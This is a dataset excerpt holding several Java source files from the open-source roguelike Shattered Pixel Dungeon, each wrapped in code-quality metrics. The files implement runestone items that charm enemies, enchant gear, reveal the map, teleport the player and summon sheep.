0.26199741, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.03076923, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.03076923, "qsc_codejava_score_lines_no_logic": 0.26153846, "qsc_codejava_frac_words_no_modifier": 0.66666667, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/stones/StoneOfAffection.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.stones;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Charm;
import com.shatteredpixel.shatteredpixeldungeon.effects.CellEmitter;
import com.shatteredpixel.shatteredpixeldungeon.effects.Speck;
import com.shatteredpixel.shatteredpixeldungeon.items.stones.Runestone;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.PathFinder;
public class StoneOfAffection extends Runestone {
{
image = ItemSpriteSheet.STONE_AFFECTION;
}
@Override
protected void activate(int cell) {
for (int i : PathFinder.NEIGHBOURS9){
CellEmitter.center(cell + i).start( Speck.factory( Speck.HEART ), 0.2f, 5 );
Char ch = Actor.findChar( cell + i );
if (ch != null && ch.alignment == Char.Alignment.ENEMY){
Buff.prolong(ch, Charm.class, 10f).object = curUser.id();
}
}
Sample.INSTANCE.play( Assets.SND_CHARMS );
}
}
| 2,034 | StoneOfAffection | java | en | java | code | {"qsc_code_num_words": 255, "qsc_code_num_chars": 2034.0, "qsc_code_mean_word_length": 6.07843137, "qsc_code_frac_words_unique": 0.54509804, "qsc_code_frac_chars_top_2grams": 0.06387097, "qsc_code_frac_chars_top_3grams": 0.24516129, "qsc_code_frac_chars_top_4grams": 0.25548387, "qsc_code_frac_chars_dupe_5grams": 0.31741935, "qsc_code_frac_chars_dupe_6grams": 0.10709677, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01327178, "qsc_code_frac_chars_whitespace": 0.14798427, "qsc_code_size_file_byte": 2034.0, "qsc_code_num_lines": 61.0, "qsc_code_num_chars_line_max": 80.0, "qsc_code_num_chars_line_mean": 33.3442623, "qsc_code_frac_chars_alphabet": 0.88113099, "qsc_code_frac_chars_comments": 0.38348083, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.03571429, "qsc_codejava_score_lines_no_logic": 0.46428571, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/stones/StoneOfEnchantment.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.stones;
import com.shatteredpixel.shatteredpixeldungeon.effects.Enchanting;
import com.shatteredpixel.shatteredpixeldungeon.effects.Speck;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.items.armor.Armor;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.Weapon;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.utils.GLog;
import com.shatteredpixel.shatteredpixeldungeon.windows.WndBag;
public class StoneOfEnchantment extends InventoryStone {
{
mode = WndBag.Mode.ENCHANTABLE;
image = ItemSpriteSheet.STONE_ENCHANT;
}
@Override
protected void onItemSelected(Item item) {
if (item instanceof Weapon) {
((Weapon)item).enchant();
} else {
((Armor)item).inscribe();
}
curUser.sprite.emitter().start( Speck.factory( Speck.LIGHT ), 0.1f, 5 );
Enchanting.show( curUser, item );
if (item instanceof Weapon) {
GLog.p(Messages.get(this, "weapon"));
} else {
GLog.p(Messages.get(this, "armor"));
}
useAnimation();
}
@Override
public int price() {
return 30 * quantity;
}
}
| 2,096 | StoneOfEnchantment | java | en | java | code | {"qsc_code_num_words": 253, "qsc_code_num_chars": 2096.0, "qsc_code_mean_word_length": 6.20948617, "qsc_code_frac_words_unique": 0.52173913, "qsc_code_frac_chars_top_2grams": 0.10821133, "qsc_code_frac_chars_top_3grams": 0.24188415, "qsc_code_frac_chars_top_4grams": 0.25206875, "qsc_code_frac_chars_dupe_5grams": 0.26925525, "qsc_code_frac_chars_dupe_6grams": 0.03564609, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01244344, "qsc_code_frac_chars_whitespace": 0.15648855, "qsc_code_size_file_byte": 2096.0, "qsc_code_num_lines": 71.0, "qsc_code_num_chars_line_max": 75.0, "qsc_code_num_chars_line_mean": 29.52112676, "qsc_code_frac_chars_alphabet": 0.87613122, "qsc_code_frac_chars_comments": 0.3726145, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.16666667, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00836502, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.05555556, "qsc_codejava_score_lines_no_logic": 0.33333333, "qsc_codejava_frac_words_no_modifier": 0.66666667, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/stones/StoneOfClairvoyance.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.stones;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.effects.CheckedCell;
import com.shatteredpixel.shatteredpixeldungeon.items.scrolls.ScrollOfMagicMapping;
import com.shatteredpixel.shatteredpixeldungeon.items.stones.Runestone;
import com.shatteredpixel.shatteredpixeldungeon.mechanics.ShadowCaster;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.Point;
public class StoneOfClairvoyance extends Runestone {
private static final int DIST = 12;
{
image = ItemSpriteSheet.STONE_CLAIRVOYANCE;
}
@Override
protected void activate(final int cell) {
Point c = Dungeon.level.cellToPoint(cell);
int[] rounding = ShadowCaster.rounding[DIST];
int left, right;
int curr;
boolean noticed = false;
for (int y = Math.max(0, c.y - DIST); y <= Math.min(Dungeon.level.height()-1, c.y + DIST); y++) {
if (rounding[Math.abs(c.y - y)] < Math.abs(c.y - y)) {
left = c.x - rounding[Math.abs(c.y - y)];
} else {
left = DIST;
while (rounding[left] < rounding[Math.abs(c.y - y)]){
left--;
}
left = c.x - left;
}
right = Math.min(Dungeon.level.width()-1, c.x + c.x - left);
left = Math.max(0, left);
for (curr = left + y * Dungeon.level.width(); curr <= right + y * Dungeon.level.width(); curr++){
curUser.sprite.parent.addToBack( new CheckedCell( curr ) );
Dungeon.level.mapped[curr] = true;
if (Dungeon.level.secret[curr]) {
Dungeon.level.discover(curr);
if (Dungeon.level.heroFOV[curr]) {
GameScene.discoverTile(curr, Dungeon.level.map[curr]);
ScrollOfMagicMapping.discover(curr);
noticed = true;
}
}
}
}
if (noticed) {
Sample.INSTANCE.play( Assets.SND_SECRET );
}
Sample.INSTANCE.play( Assets.SND_TELEPORT );
GameScene.updateFog();
}
}
| 2,901 | StoneOfClairvoyance | java | en | java | code | {"qsc_code_num_words": 370, "qsc_code_num_chars": 2901.0, "qsc_code_mean_word_length": 5.54324324, "qsc_code_frac_words_unique": 0.42702703, "qsc_code_frac_chars_top_2grams": 0.04388103, "qsc_code_frac_chars_top_3grams": 0.16674793, "qsc_code_frac_chars_top_4grams": 0.1716236, "qsc_code_frac_chars_dupe_5grams": 0.19746465, "qsc_code_frac_chars_dupe_6grams": 0.06240858, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00964361, "qsc_code_frac_chars_whitespace": 0.1778697, "qsc_code_size_file_byte": 2901.0, "qsc_code_num_lines": 92.0, "qsc_code_num_chars_line_max": 101.0, "qsc_code_num_chars_line_mean": 31.5326087, "qsc_code_frac_chars_alphabet": 0.85031447, "qsc_code_frac_chars_comments": 0.2688728, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.01818182, "qsc_codejava_score_lines_no_logic": 0.23636364, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/stones/StoneOfBlink.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.stones;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.items.scrolls.ScrollOfTeleportation;
import com.shatteredpixel.shatteredpixeldungeon.items.stones.Runestone;
import com.shatteredpixel.shatteredpixeldungeon.mechanics.Ballistica;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class StoneOfBlink extends Runestone {
{
image = ItemSpriteSheet.STONE_BLINK;
}
private static Ballistica throwPath;
@Override
public int throwPos(Hero user, int dst) {
throwPath = new Ballistica( user.pos, dst, Ballistica.PROJECTILE );
return throwPath.collisionPos;
}
@Override
protected void onThrow(int cell) {
if (Actor.findChar(cell) != null && throwPath.dist >= 1){
cell = throwPath.path.get(throwPath.dist-1);
}
throwPath = null;
super.onThrow(cell);
}
@Override
protected void activate(int cell) {
ScrollOfTeleportation.teleportToLocation(curUser, cell);
}
}
| 1,891 | StoneOfBlink | java | en | java | code | {"qsc_code_num_words": 234, "qsc_code_num_chars": 1891.0, "qsc_code_mean_word_length": 6.21794872, "qsc_code_frac_words_unique": 0.54700855, "qsc_code_frac_chars_top_2grams": 0.08178694, "qsc_code_frac_chars_top_3grams": 0.18281787, "qsc_code_frac_chars_top_4grams": 0.1814433, "qsc_code_frac_chars_dupe_5grams": 0.23024055, "qsc_code_frac_chars_dupe_6grams": 0.03848797, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01179392, "qsc_code_frac_chars_whitespace": 0.1480698, "qsc_code_size_file_byte": 1891.0, "qsc_code_num_lines": 58.0, "qsc_code_num_chars_line_max": 85.0, "qsc_code_num_chars_line_mean": 32.60344828, "qsc_code_frac_chars_alphabet": 0.89137182, "qsc_code_frac_chars_comments": 0.41248017, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.1, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.1, "qsc_codejava_score_lines_no_logic": 0.36666667, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/stones/StoneOfFlock.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.stones;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.npcs.Sheep;
import com.shatteredpixel.shatteredpixeldungeon.effects.CellEmitter;
import com.shatteredpixel.shatteredpixeldungeon.effects.Speck;
import com.shatteredpixel.shatteredpixeldungeon.items.stones.Runestone;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.PathFinder;
import com.watabou.utils.Random;
public class StoneOfFlock extends Runestone {
{
image = ItemSpriteSheet.STONE_FLOCK;
}
@Override
protected void activate(int cell) {
for (int i : PathFinder.NEIGHBOURS9){
if (!Dungeon.level.solid[cell + i]
&& !Dungeon.level.pit[cell + i]
&& Actor.findChar(cell + i) == null) {
Sheep sheep = new Sheep();
sheep.lifespan = Random.IntRange(5, 8);
sheep.pos = cell + i;
GameScene.add(sheep);
Dungeon.level.occupyCell(sheep);
CellEmitter.get(sheep.pos).burst(Speck.factory(Speck.WOOL), 4);
}
}
CellEmitter.get(cell).burst(Speck.factory(Speck.WOOL), 4);
Sample.INSTANCE.play(Assets.SND_PUFF);
}
}
| 2,217 | StoneOfFlock | java | en | java | code | {"qsc_code_num_words": 280, "qsc_code_num_chars": 2217.0, "qsc_code_mean_word_length": 5.98571429, "qsc_code_frac_words_unique": 0.50714286, "qsc_code_frac_chars_top_2grams": 0.06443914, "qsc_code_frac_chars_top_3grams": 0.22673031, "qsc_code_frac_chars_top_4grams": 0.23627685, "qsc_code_frac_chars_dupe_5grams": 0.2601432, "qsc_code_frac_chars_dupe_6grams": 0.06563246, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01163406, "qsc_code_frac_chars_whitespace": 0.14704556, "qsc_code_size_file_byte": 2217.0, "qsc_code_num_lines": 66.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 33.59090909, "qsc_code_frac_chars_alphabet": 0.87466949, "qsc_code_frac_chars_comments": 0.35182679, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.02857143, "qsc_codejava_score_lines_no_logic": 0.4, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, 